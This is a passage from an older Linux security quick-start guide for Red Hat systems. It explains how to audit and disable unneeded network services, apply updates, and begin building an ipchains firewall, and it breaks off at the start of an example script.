        to provide reliable information. And the suggestions made in the next
        several sections will not help you recover your system. Please jump
        straight to the Have I been Hacked? section, and read that first.
-----------------------------------------------------------------------------

2.1. The Optimum Configuration

Ideally, we would want one computer as a dedicated firewall and router. This
would be a bare bones installation, with no servers running, and only the
required services and components installed. The rest of our systems would
connect via this dedicated router/firewall system. If we wanted publicly
accessible servers (web, mail, etc), these would be in a "DMZ"
(De-militarized Zone). The router/firewall allows connections from outside to
whatever services are running in the DMZ by "forwarding" these requests, but
it is segregated from the rest of the internal network (aka LAN) otherwise.
This leaves the rest of the internal network in fairly secure isolation, and
relative safety. The "danger zone" is confined to the DMZ.

But not everyone has the hardware to dedicate to this kind of installation.
This would require a minimum of two computers. Or three, if you would be
running any publicly available servers (not a good idea initially). Or maybe
you are just new to Linux, and don't know your way around well enough yet. So
if we can't do the ideal installation, we will do the next best thing.
-----------------------------------------------------------------------------

2.2. Before We Start

Before we get to the actual configuration sections, a couple of notes.

With Linux, there is always more than one way to perform any task. For the
purposes of our discussion, we will have to use as generic set of tools as we
can. Unfortunately, GUI tools don't lend themselves to this type of
documentation. So we will be using text based, command line tools for the
most part. Red Hat does provide various GUI utilities, feel free to
substitute those in appropriate places.

The next several sections have been written such that you can perform the
recommended procedures as you read along. This is the "Quick Start" in the
document title!

To get ready, what you will need for the configuration sections below:

<A0><A0>*<2A>A text editor. There are many available. If you use a file manager
    application like gmc or nautilus, it probably has a built in editor. This
    will be fine. pico and mcedit are two relatively easy to use editors if
    you don't already have a favorite. There is a quick guide to Text editors
    in the Appendix that might help you get started. It is always a good idea
    to make a back up copy, before editing system configuration files.

<A0><A0>*<2A>For non-GUI editors and some of the commands, you will also need a
    terminal window opened. xterm, rxvt, and gnome-terminal all will work, as
    well as others.


We'll be using a hypothetical system here for examples with the hostname
"bigcat". Bigcat is a Linux desktop with a fresh install of the latest/
greatest Red Hat running. Bigcat has a full-time, direct Internet connection.
Even if your installation is not so "fresh", don't be deterred. Better late
than never.
-----------------------------------------------------------------------------

3. Step 1: Which services do we really need?

In this section we will see which services are running on our freshly
installed system, decide which we really need, and do away with the rest. If
you are not familiar with how servers and TCP connections work, you may want
to read the section on servers and ports in the Appendix first. If not
familiar with the netstat utility, you may want to read a quick overview of
it beforehand. There is also a section in the Appendix on ports, and
corresponding services. You may want to look that over too.

Our goal is to turn off as many services as possible. If we can turn them all
off, or at least off to outside connections, so much the better. Some rules
of thumb we will use to guide us:

<A0><A0>*<2A>It is perfectly possible to have a fully functional Internet connection
    with no servers running that are accessible to outside connections. Not
    only possible, but desirable in many cases. The principle here is that
    you will never be successfully broken into via a port that is not opened
    because no server is listening on it. No server == no port open == not
    vulnerable. At least to outside connections.

<A0><A0>*<2A>If you don't recognize a particular service, chances are good you don't
    really need it. We will assume that and so we'll turn it off. This may
    sound dangerous, but is a good rule of thumb to go by.

<A0><A0>*<2A>Some services are just not intended to be run over the Internet -- even
    if you decide it is something you really do need. We'll flag these as
    dangerous, and address these in later sections, should you decide you do
    really need them, and there is no good alternative.


-----------------------------------------------------------------------------
3.1. System Audit

So what is really running on our system anyway? Let's not take anything for
granted about what "should" be running, or what we "think" is running.

Which services get installed and started will vary greatly depending on which
version of Red Hat, and which installation options were chosen. Earlier
releases were very much prone to start many services and then let the user
figure out which ones were needed, and which ones weren't. Recent versions
are much more cautious. But this makes providing a ready made list of likely
services impossible. Not to worry, as we shouldn't trust what is supposed to
be running anyway. What we need to do is list for ourselves all running
services.

Now open an xterm, and su to root. You'll need to widen the window wide so
the lines do not wrap. Use this command: netstat -tap |grep LISTEN. This will
give us a list of all currently running servers as indicated by the keyword
LISTEN, along with the "PID" and "Program Name" that started each particular
service.

+----------------------------------------------------------------------------------+
|# netstat -tap |grep LISTEN                                                       |
|  *:exec               *:*        LISTEN    988/inetd                             |
|  *:login              *:*        LISTEN    988/inetd                             |
|  *:shell              *:*        LISTEN    988/inetd                             |
|  *:printer            *:*        LISTEN    988/inetd                             |
|  *:time               *:*        LISTEN    988/inetd                             |
|  *:x11                *:*        LISTEN    1462/X                                |
|  *:http               *:*        LISTEN    1078/httpd                            |
|  bigcat:domain        *:*        LISTEN    956/named                             |
|  bigcat:domain        *:*        LISTEN    956/named                             |
|  *:ssh                *:*        LISTEN    972/sshd                              |
|  *:auth               *:*        LISTEN    388/in.identd                         |
|  *:telnet             *:*        LISTEN    988/inetd                             |
|  *:finger             *:*        LISTEN    988/inetd                             |
|  *:sunrpc             *:*        LISTEN    1290/portmap                          |
|  *:ftp                *:*        LISTEN    988/inetd                             |
|  *:smtp               *:*        LISTEN    1738/sendmail: accepting connections  |
|  *:1694               *:*        LISTEN    1319/rpc.mountd                       |
|  *:netbios-ssn        *:*        LISTEN    422/smbd                              |
|                                                                                  |
|                                                                                  |
+----------------------------------------------------------------------------------+

Red Hat 7.x and Mandrake 8.x and later users will have xinetd in place of
inetd. Note the first three columns are cropped above for readability. If
your list is as long as the example, you have some work ahead of you! It is
highly unlikely that you really need anywhere near this number of servers
running.

Please be aware that the example above is just one of many, many possible
system configurations. Yours probably does look very different.

You don't understand what any of this is telling you? Hopefully then, you've
read the netstat tutorial in the Appendix, and understand how it works.
Understanding exactly what each server is in the above example, and what it
does, is beyond the scope of this document. You will have to check your
system's documentation (e.g. Installation Guide, man pages, etc) if that
service is important to you. For example, does "exec", "login", and "shell"
sound important? Yes, but these are not what they may sound like. They are
actually rexec, rlogin, and rsh, the "r" (for remote) commands. These are
antiquated, unnecessary, and in fact, are very dangerous if exposed to the
Internet.

Let's make a few quick assumptions about what is necessary and unnecessary,
and therefore what goes and what stays on bigcat. Since we are running a
desktop on bigcat, X11 of course needs to stay. If bigcat were a dedicated
server of some kind, then X11 would be unnecessary. If there is a printer
physically attached, the printer (lp) daemon should stay. Otherwise, it goes.
Print servers may sound harmless, but are potential targets too since they
can hold ports open. If we plan on logging in to bigcat from other hosts,
sshd (Secure SHell Daemon) would be necessary. If we have Microsoft hosts on
our LAN, we probably want Samba, so smbd should stay. Otherwise, it is
completely unnecessary. Everything else in this example is optional and not
required for a normally functioning system, and should probably go. See
anything that you don't recognize? Not sure about? It goes!

To sum up: since bigcat is a desktop with a printer attached, we will need
"x11", "printer". bigcat is on a LAN with MS hosts, and shares files and
printing with them, so "netbios-ssn" (smbd) is desired. We will also need
"ssh" so we can login from other machines. Everything else is unnecessary for
this particular case.

Nervous about this? If you want, you can make notes of any changes you make
or save the list of servers you got from netstat, with this command: netstat
-tap |grep LISTEN > ~/services.lst. That will save it your home directory
with the name of "services.lst" for future reference.

This is to not say that the ones we have decided to keep are inherently safe.
Just that we probably need these. So we will have to deal with these via
firewalling or other means (addressed below).

It is worth noting that the telnet and ftp daemons in the above example are
servers, aka "listeners". These accept incoming connections to you. You do
not need, or want, these just to use ftp or telnet clients. For instance, you
can download files from an FTP site with just an ftp client. Running an ftp
server on your end is not required at all, and has serious security
implications.

There may be individual situations where it is desirable to make exceptions
to the conclusions reached above. See below.
-----------------------------------------------------------------------------

3.2. The Danger Zone (or r00t m3 pl34s3)

The following is a list of services that should not be run over the Internet.
Either disable these (see below), uninstall, or if you really do need these
services running locally, make sure they are the current, patched versions
and that they are effectively firewalled. And if you don't have a firewall in
place now, turn them off until it is up and verified to be working properly.
These are potentially insecure by their very nature, and as such are prime
cracker targets.

<A0><A0>*<2A>NFS (Network File System) and related services, including nfsd, lockd,
    mountd, statd, portmapper, etc. NFS is the standard Unix service for
    sharing file systems across a network. Great system for LAN usage, but
    dangerous over the Internet. And its completely unnecessary on a stand
    alone system.

<A0><A0>*<2A>rpc.* services, Remote Procedure Call.*, typically NFS and NIS related
    (see above).

<A0><A0>*<2A>Printer services (lpd).

<A0><A0>*<2A>The so-called r* (for "remote", i.e. Remote SHell) services: rsh, rlogin,
    rexec, rcp etc. Unnecessary, insecure and potentially dangerous, and
    better utilities are available if these capabilities are needed. ssh will
    do everything these command do, and in a much more sane way. See the man
    pages for each if curious. These will probably show in netstat output
    without the "r": rlogin will be just "login", etc.

<A0><A0>*<2A>telnet server. There is no reason for this anymore. Use sshd instead.

<A0><A0>*<2A>ftp server. There are better, safer ways for most systems to exchange
    files like scp or via http (see below). ftp is a proper protocol only for
    someone who is running a dedicated ftp server, and who has the time and
    skill to keep it buttoned down. For everyone else, it is potentially big
    trouble.

<A0><A0>*<2A>BIND (named), DNS server package. With some work, this can be done
    without great risk, but is not necessary in many situations, and requires
    special handling no matter how you do it. See the sections on Exceptions
    and special handling for individual applications.

<A0><A0>*<2A>Mail Transport Agent, aka "MTA" (sendmail, exim, postfix, qmail). Most
    installations on single computers will not really need this. If you are
    not going to be directly receiving mail from Internet hosts (as a
    designated MX box), but will rather use the POP server of your ISP, then
    it is not needed. You may however need this if you are receiving mail
    directly from other hosts on your LAN, but initially it's safer to
    disable this. Later, you can enable it over the local interface once your
    firewall and access policies have been implemented.


This is not necessarily a definitive list. Just some common services that are
sometimes started on default Red Hat installations. And conversely, this does
not imply that other services are inherently safe.
-----------------------------------------------------------------------------

3.3. Stopping Services

The next step is to find where each server on our kill list is being started.
If it is not obvious from the netstat output, use ps, find, grep or locate to
find more information from the "Program name" or "PID" info in the last
column. There is examples of this in the Process Owner section in the netstat
Tutorial of the Appendix. If the service name or port number do not look
familiar to you, you might get a real brief explanation in your /etc/services
file.

chkconfig is a very useful command for controlling services that are started
via init scripts (see example below). Also, where xinetd is used, it can
control those services as well. chkconfig can tell us what services the
system is configured to run, but not necessarily all services that are indeed
actually running. Or what services may be started by other means, e.g. from
rc.local. It is a configuration tool, more than a real time system auditing
too.

Skeptical that we are going to break your system, and the pieces won't go
back together again? If so, take this approach: turn off everything listed
above in "The Danger Zone", and run your system for a while. OK? Try stopping
one of the ones we found to be "unnecessary" above. Then, run the system for
a while. Keep repeating this process, until you get to the bare minimum. If
this works, then make the changes permanent (see below).

The ultimate objective is not just to stop the service now, but to make sure
it is stopped permanently! So whatever steps you take here, be sure to check
after your next reboot.

There are various places and ways to start system services. Let's look at the
most common ways this is done, and is probably how your system works. System
services are typically either started by "init" scripts, or by inetd (or its
replacement xinetd) on most distributions.
-----------------------------------------------------------------------------

3.3.1. Stopping Init Services

Init services are typically started automatically during the boot process, or
during a runlevel change. There is a naming scheme that uses symlinks to
determine which services are to be started, or stopped, at any given
runlevel. The scripts themselves should be in /etc/init.d/ (or possibly /etc/
rc.d/init.d/ for older versions of Red Hat).

You can get a listing of these scripts:

+---------------------------------------------------------------------------+
|  # ls -l /etc/rc.d/init.d/ | less                                         |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

To stop a running service now, as root:

+---------------------------------------------------------------------------+
| # /etc/init.d/<$SERVICE_NAME> stop                                        |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Where "$SERVICE_NAME" is the name of the init script, which is often, but not
always, the same as the service name itself. Older Red Hat versions may use
the path /etc/rc.d/init.d/ instead.

This only stops this particular service now. It will restart again on the
next reboot, or runlevel change, unless additional steps are taken. So this
is really a two step process for init type services.

chkconfig can be used to see what services are started at each runlevel, and
to turn off any unneeded services. To view all services under its control,
type this command in an xterm:

+---------------------------------------------------------------------------+
|                                                                           |
| # chkconfig --list | less                                                 |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

To view only the ones that are "on":

+---------------------------------------------------------------------------+
|                                                                           |
| # chkconfig --list | grep "\bon\b" | less                                 |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

The first column is the service name, and the remaining columns are the
various runlevels. We need generally only worry about runlevels 3 (boot to
text console login) and 5 (boot straight to X11 login). xinetd services won't
have columns, since that aspect would be controlled by xinetd itself.

Examples of commands to turn services "off":

+---------------------------------------------------------------------------+
|                                                                           |
| # chkconfig portmapper off                                                |
| # chkconfig nfs off                                                       |
| # chkconfig telnet off                                                    |
| # chkconfig rlogin off                                                    |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Note that the last two are xinetd services. A very easy and nifty tool to
use! Red Hat also includes ntsysv and tksysv (GUI) for runlevel and service
configuration. See the man pages for additional command line options.

Another option here is to uninstall a package if you know you do not need it.
This is a pretty sure-fire, permanent fix. This also alleviates the potential
problem of keeping all installed packages updated and current (Step 2). RPM
makes it very easy to re-install a package should you change your mind.

To uninstall packages with RPM:

+---------------------------------------------------------------------------+
| # rpm -ev telnet-server  rsh  rsh-server                                  |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

The above command would uninstall the "telnet server" package (but not telnet
client!), "rsh" client and "rsh server" packages in one command. Red Hat also
includes gnorpm, a GUI RPM management utility which can do this as well.
-----------------------------------------------------------------------------

3.3.2. Inetd

Inetd is called a "super-daemon" because it is used to spawn sub-daemons.
inetd itself will generally be started via init scripts, and will "listen" on
the various ports as determined by which services are enable in its
configuration file, /etc/inetd.conf. Any service listed here will be under
the control of inetd. Likewise, any of the listening servers in netstat
output that list "inetd" in the last column under "Program Name", will have
been started by inetd. You will have to adjust the inetd configuration to
stop these services. xinetd is an enhanced inetd replacement, and is
configured differently (see next section below).

Below is a partial snippet from a typical inetd.conf. Any service with a "#"
at the beginning of the line is "commented out", and thus ignored by inetd,
and consequently disabled.

+---------------------------------------------------------------------------+
|#                                                                          |
|# inetd.conf  This file describes the services that will be available      |
|#    through the INETD TCP/IP super server.  To re-configure               |
|#    the running INETD process, edit this file, then send the              |
|#    INETD process a SIGHUP signal.                                        |
|#                                                                          |
|# Version:  @(#)/etc/inetd.conf  3.10  05/27/93                            |
|#                                                                          |
|# Authors:  Original taken from BSD UNIX 4.3/TAHOE.                        |
|#    Fred N. van Kempen, <waltje@uwalt.nl.mugnet.org>                      |
|#                                                                          |
|# Modified for Debian Linux by Ian A. Murdock <imurdock@shell.portal.com>  |
|#                                                                          |
|# Echo, discard, daytime, and chargen are used primarily for testing.      |
|#                                                                          |
|# To re-read this file after changes, just do a 'killall -HUP inetd'       |
|#                                                                          |
|#echo  stream  tcp  nowait  root  internal                                 |
|#echo  dgram  udp   wait    root  internal                                 |
|#discard  stream  tcp  nowait  root  internal                              |
|#discard  dgram  udp   wait    root  internal                              |
|#daytime  stream tcp   nowait  root  internal                              |
|#daytime  dgram  udp   wait    root  internal                              |
|#chargen  stream tcp   nowait  root  internal                              |
|#chargen  dgram  udp   wait    root  internal                              |
|time  stream    tcp   nowait  root  internal                               |
|#                                                                          |
|# These are standard services.                                             |
|#                                                                          |
|#ftp     stream  tcp   nowait  root  /usr/sbin/tcpd  in.ftpd -l -a         |
|#telnet  stream  tcp   nowait  root  /usr/sbin/tcpd  in.telnetd            |
|#                                                                          |
|# Shell, login, exec, comsat and talk are BSD protocols.                   |
|#                                                                          |
|#shell  stream  tcp  nowait  root  /usr/sbin/tcpd  in.rshd                 |
|#login  stream  tcp  nowait  root  /usr/sbin/tcpd  in.rlogind              |
|#exec   stream  tcp  nowait  root  /usr/sbin/tcpd  in.rexecd               |
|#comsat dgram   udp  wait    root  /usr/sbin/tcpd  in.comsat               |
|#talk   dgram   udp  wait    root  /usr/sbin/tcpd  in.talkd                |
|#ntalk  dgram   udp  wait    root  /usr/sbin/tcpd  in.ntalkd               |
|#dtalk  stream  tcp  wait    nobody /usr/sbin/tcpd in.dtalkd               |
|#                                                                          |
|# Pop and imap mail services et al                                         |
|#                                                                          |
|#pop-2   stream  tcp     nowait  root    /usr/sbin/tcpd  ipop2d            |
|pop-3    stream  tcp     nowait  root    /usr/sbin/tcpd  ipop3d            |
|#imap    stream  tcp     nowait  root    /usr/sbin/tcpd  imapd             |
|#                                                                          |
|# The Internet UUCP service.                                               |
|#                                                                          |
|#uucp  stream tcp nowait uucp /usr/sbin/tcpd  /usr/lib/uucp/uucico -l      |
|#                                                                          |
|                                                                           |
|<snip>                                                                     |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

The above example has two services enabled: time and pop3. To disable these,
all we need is to open the file with a text editor, comment out the two
services with a "#", save the file, and then restart inetd (as root):

+---------------------------------------------------------------------------+
|                                                                           |
|  # /etc/rc.d/init.d/inetd restart                                         |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Check your logs for errors, and run netstat again to verify all went well.

A quicker way of getting the same information, using grep:

+---------------------------------------------------------------------------+
| $ grep  -v '^#' /etc/inetd.conf                                           |
| time     stream  tcp     nowait  root  internal                           |
| pop-3    stream  tcp     nowait  root  /usr/sbin/tcpd  ipop3d             |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Again, do you see anything there that you don't know what it is? Then in all
likelihood you are not using it, and it should be disabled.

Unlike the init services configuration, this is a lasting change so only the
one step is required.

Let's expose one myth that gets tossed around: you shouldn't disable a
service by commenting out, or removing, entries from /etc/services. This may
have the desired effect in some cases, but is not the right way to do it, and
may interfere with the normal operation of other system utilities.
-----------------------------------------------------------------------------

3.3.3. Xinetd

xinetd is an inetd replacement with enhancements. Red Hat includes xinetd
with 7.0 and later releases. It essentially serves the same purpose as inetd,
but the configuration is different. The configuration can be in the file /etc
/xinetd.conf, or individual files in the directory /etc/xinetd.d/.
Configuration of individual services will be in the individual files under /
etc/xinetd.d/*. Turning off xinetd services is done by either deleting the
corresponding configuration section, or file. Or by using your text editor
and simply setting disable = yes for the appropriate service. Or by using
chkconfig. Then, xinetd will need to be restarted. See man xinetd and man
xinetd.conf for syntax and configuration options. A sample xinetd
configuration:

+---------------------------------------------------------------------------+
| # default: on                                                             |
| # description: The wu-ftpd FTP server serves FTP connections. It uses \   |
| #       normal, unencrypted usernames and passwords for authentication.   |
| service ftp                                                               |
| {                                                                         |
|        disable                 = no                                       |
|        socket_type             = stream                                   |
|        wait                    = no                                       |
|        user                    = root                                     |
|        server                  = /usr/sbin/in.ftpd                        |
|        server_args             = -l -a                                    |
|        log_on_success          += DURATION USERID                         |
|        log_on_failure          += USERID                                  |
|        nice                    = 10                                       |
| }                                                                         |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

You can get a quick list of enabled services:

+---------------------------------------------------------------------------+
| $ grep disable /etc/xinetd.d/* |grep no                                   |
| /etc/xinetd.d/finger:   disable = no                                      |
| /etc/xinetd.d/rexec:    disable = no                                      |
| /etc/xinetd.d/rlogin:   disable = no                                      |
| /etc/xinetd.d/rsh:      disable = no                                      |
| /etc/xinetd.d/telnet:   disable = no                                      |
| /etc/xinetd.d/wu-ftpd:  disable = no                                      |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

At this point, the above output should raise some red flags. In the
overwhelming majority of systems, all the above can be disabled without any
adverse impact. Not sure? Try it without that service. After disabling
unnecessary services, then restart xinetd:

+---------------------------------------------------------------------------+
|                                                                           |
|  # /etc/rc.d/init.d/xinetd restart                                        |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+
-----------------------------------------------------------------------------

3.3.4. When All Else Fails

OK, if you can't find the "right" way to stop a service, or maybe a service
is being started and you can't find how or where, you can "kill" the process.
To do this, you will need to know the PID (Process I.D.). This can be found
with ps, top, fuser or other system utilities. For top and ps, this will be
the number in the first column. See the Port and Process Owner section in the
Appendix for examples.

Example (as root):

+---------------------------------------------------------------------------+
| # kill 1163                                                               |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Then run top or ps again to verify that the process is gone. If not, then:

+---------------------------------------------------------------------------+
| # kill -KILL 1163                                                         |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Note the second "KILL" in there. This must be done either by the user who
owns the process, or root. Now go find where and how this process got started
;-)

The /proc filesystem can also be used to find out more information about each
process. Armed with the PID, we can find the path to a mysterious process:

+---------------------------------------------------------------------------+
| $ /bin/ps ax|grep tcpgate                                                 |
|  921 ?   S    0:00        tcpgate                                         |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

+----------------------------------------------------------------------------------+
| # ls -l /proc/921/exe                                                            |
| lrwxrwxrwx 1 root  root  0 July 21 12:11 /proc/921/exe -> /usr/local/bin/tcpgate |
|                                                                                  |
|                                                                                  |
+----------------------------------------------------------------------------------+
-----------------------------------------------------------------------------

3.4. Exceptions

Above we used the criteria of turning off all unnecessary services. Sometimes
that is not so obvious. And sometimes what may be required for one person's
configuration is not the same for another's. Let's look at a few common
services that fall in this category.

Again, our rule of thumb is if we don't need it, we won't run it. It's that
simple. If we do need any of these, they are prime candidates for some kind
of restrictive policies via firewall rules or other mechanisms (see below).

<A0><A0>*<2A>identd - This is a protocol that has been around for ages, and is often
    installed and running by default. It is used to provide a minimal amount
    of information about who is connecting to a server. But, it is not
    necessary in many cases. Where might you need it? Most IRC servers
    require it. Many mail servers use it, but don't really require it. Try
    your mail setup without it. If identd is going to be a problem, it will
    be because there is a time out before before the server starts sending or
    receiving mail. So mail should work fine without it, but may be slower. A
    few ftp servers may require it. Most don't though. Older versions of Red
    Hat started identd via inetd. Recent versions start this via init
    scripts.

    If identd is required, there are some configuration options that can
    greatly reduce the information that is revealed:

    +---------------------------------------------------------------+
    |                                                               |
    |    /usr/sbin/in.identd in.identd -l -e -o -n -N               |
    |                                                               |
    |                                                               |
    +---------------------------------------------------------------+

    The -o flag tells identd to not reveal the operating system type it is
    run on and to instead always return "OTHER". The -e flag tells identd to
    always return "UNKNOWN-ERROR" instead of the "NO-USER" or "INVALID-PORT"
    errors. The -n flag tells identd to always return user numbers instead of
    user names, if you wish to keep the user names a secret. The -N flag
    makes identd check for the file .noident in the user's home directory for
    which the daemon is about to return a user name. It that file exists then
    the daemon will give the error "HIDDEN-USER" instead of the normal
    "USERID" response.

<A0><A0>*<2A>Mail server (MTA's like sendmail, qmail, etc) - Often a fully functional
    mail server like sendmail is installed by default. The only time that
    this is actually required is if you are hosting a domain, and receiving
    incoming mail directly. Or possibly, for exchanging mail on a LAN, in
    which case it does not need Internet exposure and can be safely
    firewalled. For your ISP's POP mail access, you don't need it even though
    this is a common configuration. One alternative here is to use fetchmail
    for POP mail retrieval with the -m option to specify a local delivery
    agent: fetchmail -m procmail for instance works with no sendmail daemon
    running at all. Sendmail, can be handy to have running, but the point is,
    it is not required in many situations, and can be disabled, or firewalled
    safely.

<A0><A0>*<2A>BIND (named) - This often is installed by default, but is only really
    needed if you are an authoritative name server for a domain. If you are
    not sure what this means, then you definitely don't need it. BIND is
    probably the number one crack target on the Internet. BIND is often used
    though in a "caching" only mode. This can be quite useful, but does not
    require full exposure to the Internet. In other words, it should be
    restricted or firewalled. See special handling of individual applications
    below.


-----------------------------------------------------------------------------
3.5. Summary and Conclusions for Step 1

In this section we learned how to identify which services are running on our
system, and were given some tips on how to determine which services may be
necessary. Then we learned how to find where the services were being started,
and how to stop them. If this has not made sense, now is a good time to
re-read the above.

Hopefully you've already taken the above steps. Be sure to test your results
with netstat again, just to verify the desired end has been achieved, and
only the services that are really required are running.

It would also be wise to do this after the next reboot, anytime you upgrade a
package (to make sure a new configuration does not sneak in), and after every
system upgrade or new install.
-----------------------------------------------------------------------------

4. Step 2: Updating

OK, this section should be comparatively short, simple and straightforward
compared to the above, but no less important.

The very first thing after a new install you should check the errata notices
at [http://redhat.com/errata/] http://redhat.com/apps/errata/, and apply all
relevant updates. Only a year old you say? That's a long time actually, and
not current enough to be safe. Only a few months or few weeks? Check anyway.
A day or two? Better safe than sorry. It is quite possible that security
updates have been released during the pre-release phase of the development
and release cycle. If you can't take this step, disable any publicly
accessible services until you can.

Linux distributions are not static entities. They are updated with new,
patched packages as the need arises. The updates are just as important as the
original installation. Even more so, since they are fixes. Sometimes these
updates are bug fixes, but quite often they are security fixes because some
hole has been discovered. Such "holes" are immediately known to the cracker
community, and they are quick to exploit them on a large scale. Once the hole
is known, it is quite simple to get in through it, and there will be many out
there looking for it. And Linux developers are also equally quick to provide
fixes. Sometimes the same day as the hole has become known!

Keeping all installed packages current with your release is one of the most
important steps you can take in maintaining a secure system. It can not be
emphasized enough that all installed packages should be kept updated -- not
just the ones you use. If this is burdensome, consider uninstalling any
unused packages. Actually this is a good idea anyway.

But where to get this information in a timely fashion? There are a number of
web sites that offer the latest security news. There are also a number of
mailing lists dedicated to this topic. In fact, Red Hat has the "watch" list,
just for this purpose at [https://listman.redhat.com/mailman/listinfo/
redhat-watch-list] https://listman.redhat.com/mailman/listinfo/
redhat-watch-list. This is a very low volume list by the way. This is an
excellent way to stay abreast of issues effecting your release, and is highly
recommended. [http://linuxsecurity.com] http://linuxsecurity.com is a good
site for Linux only issues. They also have weekly newsletters available:
[http://www.linuxsecurity.com/general/newsletter.html] http://
www.linuxsecurity.com/general/newsletter.html.

Red Hat also has the up2date utility for automatically keeping your system(s)
up to date ;-). See the man page for details.

This is not a one time process -- it is ongoing. It is important to stay
current. So watch those security notices. And subscribe to that security
mailing list today! If you have cable modem, DSL, or other full time
connection, there is no excuse not to do this religiously. All distributions
make this easy enough!

One last note: any time a new package is installed, there is also a chance
that a new or revised configuration has been installed as well. Which means
that if this package is a server of some kind, it may be enabled as a result
of the update. This is bad manners, but it can happen, so be sure to run
netstat or comparable to verify your system is where you want it after any
updates or system changes. In fact, do it periodically even if there are no
such changes.
-----------------------------------------------------------------------------

4.1. Summary and Conclusions for Step 2

It is very simple: make sure your Linux installation is current. Check the
Red Hat errata for what updated packages may be available. There is nothing
wrong with running an older release, just so the packages in it are updated
according to what Red Hat has made available since the initial release. At
least as long as Red Hat is still supporting the release and updates are
still being provided. For instance, Red Hat has stopped providing updates for
5.0 and 5.1, but still does for 5.2.
-----------------------------------------------------------------------------

5. Step 3: Firewalls and Setting Access Policies

So what is a "firewall"? It's a vague term that can mean anything that acts
as a protective barrier between us and the outside world. This can be a
dedicated system, or a specific application that provides this functionality.
Or it can be a combination of components, including various combinations of
hardware and software. Firewalls are built from "rules" that are used to
define what is allowed to enter and exit a given system or network. Let's
look at some of the possible components that are readily available for Linux,
and how we might implement a reasonably safe firewalling strategy.

In Step 1 above, we have turned off all services we don't need. In our
example, there were a few we still needed to have running. In this section,
we will take the next step here and decide which we need to leave open to the
world. And which we might be able to restrict in some way. If we can block
them all, so much the better, but this is not always practical.
-----------------------------------------------------------------------------

5.1. Strategy

What we want to do now is restrict connections and traffic so that we only
allow the minimum necessary for whatever our particular situation is. In some
cases we may want to block all incoming "new" connection attempts. Example:
we want to run X, but don't want anyone from outside to access it, so we'll
block it completely from outside connections. In other situations, we may
want to limit, or restrict, incoming connections to trusted sources only. The
more restrictive, the better. Example: we want to ssh into our system from
outside, but we only ever do this from our workplace. So we'll limit sshd
connections to our workplace address range. There are various ways to do
this, and we'll look at the most common ones.

We also will not want to limit our firewall to any one application. There is
nothing wrong with a "layered" defense-in-depth approach. Our front line
protection will be a packet filter -- either ipchains or iptables (see
below). Then we can use additional tools and mechanisms to reinforce our
firewall.

We will include some brief examples. Our rule of thumb will be to deny
everything as the default policy, then open up just what we need. We'll try
to keep this as simple as possible since it can be an involved and complex
topic, and just stick to some of the most basic concepts. See the Links
section for further reading on this topic.
-----------------------------------------------------------------------------

5.2. Packet Filters -- Ipchains and Iptables

"Packet filters" (like ipchains) have the ability to look at individual
packets, and make decisions based on what they find. These can be used for
many purposes. One common purpose is to implement a firewall.

Common packet filters on Linux are ipchains which is standard with 2.2
kernels, and iptables which is available with the more recent 2.4 kernels.
iptables has more advanced packet filtering capabilities and is recommended
for anyone running a 2.4 kernel. But either can be effective for our
purposes. ipfwadm is a similar utility for 2.0 kernels (not discussed here).

If constructing your own ipchains or iptables firewall rules seems a bit
daunting, there are various sites that can automate the process. See the
Links section. Also the included examples may be used as a starting point. As
of Red Hat 7.1, Red Hat is providing init scripts for ipchains and iptables,
and gnome-lokkit for generating a very basic set of firewall rules (see below
). This may be adequate, but it is still recommended to know the proper
syntax and how the various mechanisms work as such tools rarely do more than
a few very simple rules.

Note Various examples are given below. These are presented for illustrative
     purposes to demonstrate some of the concepts being discussed here. While
     they might also be useful as a starting point for your own script,
     please note that they are not meant to be all encompassing. You are
     strongly encouraged to understand how the scripts work, so you can
     create something even more tailored for your own situation.

     The example scripts are just protecting inbound connections to one
     interface (the one connected to the Internet). This may be adequate for
     many simple home type situations, but, conversely, this approach is not
     adequate for all situations!
-----------------------------------------------------------------------------

5.2.1. ipchains

ipchains can be used with either 2.2 or 2.4 kernels. When ipchains is in
place, it checks every packet that moves through the system. The packets move
across different "chains", depending where they originate and where they are
going. Think of "chains" as rule sets. In advanced configurations, we could
define our own custom chains. The three default built-in chains are input,
which is incoming traffic, output, which is outgoing traffic, and forward,
which is traffic being forwarded from one interface to another (typically
used for "masquerading"). Chains can be manipulated in various ways to
control the flow of traffic in and out of our system. Rules can be added at
our discretion to achieve the desired result.

At the end of every "chain" is a "target". The target is specified with the
-j option to the command. The target is what decides the fate of the packet
and essentially terminates that particular chain. The most common targets are
mostly self-explanatory: ACCEPT, DENY, REJECT, and MASQ. MASQ is for
"ipmasquerading". DENY and REJECT essentially do the same thing, though in
different ways. Is one better than the other? That is the subject of much
debate, and depends on other factors that are beyond the scope of this
document. For our purposes, either should suffice.

ipchains has a very flexible configuration. Port (or port ranges),
interfaces, destination address, source address can be specified, as well as
various other options. The man page explains these details well enough that
we won't get into specifics here.

Traffic entering our system from the Internet, enters via the input chain.
This is the one that we need as tight as we can make it.

Below is a brief example script for a hypothetical system. We'll let the
comments explain what this script does. Anything starting with a "#" is a
comment. ipchains rules are generally incorporated into shell scripts, using
shell variables to help implement the firewalling logic.

#!/bin/sh
#
# ipchains.sh
#
# An example of a simple ipchains configuration.
#
# This script allows ALL outbound traffic, and denies
# ALL inbound connection attempts from the outside.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
IPCHAINS=/sbin/ipchains
# This is the WAN interface, that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"

## end user configuration options #################################
###################################################################

# The high ports used mostly for connections we initiate and return
# traffic.
